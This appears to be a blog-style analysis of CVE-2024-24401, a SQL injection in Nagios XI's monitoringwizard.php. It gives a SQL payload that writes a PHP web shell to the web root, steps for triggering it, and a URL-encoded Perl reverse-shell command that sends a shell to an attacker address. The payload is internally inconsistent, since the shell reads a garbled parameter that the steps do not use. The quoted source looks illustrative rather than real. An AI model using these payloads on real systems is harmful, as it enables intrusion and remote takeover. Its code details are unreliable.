CVE-2024-24401 - A Detailed Analysis of the SQL Injection Vulnerability in Nagios XI 2024R1.01 that Exploits monitoringwizard.php

Nagios XI, the powerful IT monitoring and alerting software, is often the go-to choice for many system administrators to keep tabs on the health of their networks and infrastructure. However, a newly discovered vulnerability, assigned the identifier CVE-2024-24401, has been reported in Nagios XI 2024R1.01. This vulnerability is a serious one, as it could potentially allow malicious actors to execute arbitrary codes on victim systems remotely through an SQL Injection (SQLi) attack.

Firstly, let's analyze the vulnerable code in the monitoringwizard.php component

<?php
// ...
if (isset($_REQUEST['id'])){
    $id = $_REQUEST['id'];
    $query = "SELECT * FROM wizards WHERE id='" . $id . "'";
    $result = mysql_query($query);
    /* Perform processing on $result */
}
// ...
?>

The key problem stems from the fact that the value of $_REQUEST['id'] goes through no kind of validation or sanitization before getting concatenated into the SQL query. That's a doorway for malicious user to inject their own SQL code by crafting the input to manipulate the database.

Crafting the Malicious Payload

With the understanding of the vulnerable code, a remote attacker can now craft a payload to exploit the loophole. An example of such a payload could be:

1' UNION SELECT 1, '<?php system($_GET[xc]37); ?>' INTO OUTFILE '/var/www/html/nagiosxi/nagios-inject.php' --

In this crafted payload, a UNION SELECT query is employed to concatenate results from a separate SQL SELECT. The attacker injects the malicious PHP code utilizing the system() function, having it written to nagios-inject.php on the target system, in a path that is publicly accessible.

Exploiting the Vulnerability

To exploit the vulnerability and execute arbitrary code, a potential attacker would perform the following steps:

1. Send a GET request to monitoringwizard.php on the target Nagios XI installation with their crafted payload as the id parameter.
2. Execute their desired command on the target system by sending another GET request to the maliciously created nagios-inject.php file, passing the encoded command through the c parameter.

For instance, to create a reverse shell (for your understanding purpose), the attacker would use an encoded command such as this:

http://TARGET_IP/nagiosxi/nagios-inject.php?c=perl%20-e%20%27use%20Socket%3B%24i%3D%220...%22%3B%24p%3D12345%3Bsocket%28S%2C%20PF_INET%2C%20SOCK_STREAM%2C%20getprotobyname%28%22tcp%22%29%29%3Bconnect%28S%2C%20sockaddr_in%28%24p%2C%20inet_aton%28%24i%29%29%29%3Bopen%28STDIN%2C%20%22%3E%26S%22%29%3Bopen%28STDOUT%2C%20%22%3E%26S%22%29%3Bopen%28STDERR%2C%20%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%27

References and Further Reading

- Original Reference
- Nagios XI Documentation
- SQL Injection Cheat Sheet

Closing Thoughts

SQL Injection vulnerabilities like CVE-2024-24401 are not to be taken lightly. System administrators using Nagios XI should ensure they have patched their systems and follow best security practices to minimize risks. Remember, staying informed and proactive in addressing security threats is an essential component of protecting your systems and networks against malicious actors.

Timeline

Published on: 02/26/2024 17:15:10 UTC
Last modified on: 02/26/2024 22:10:40 UTC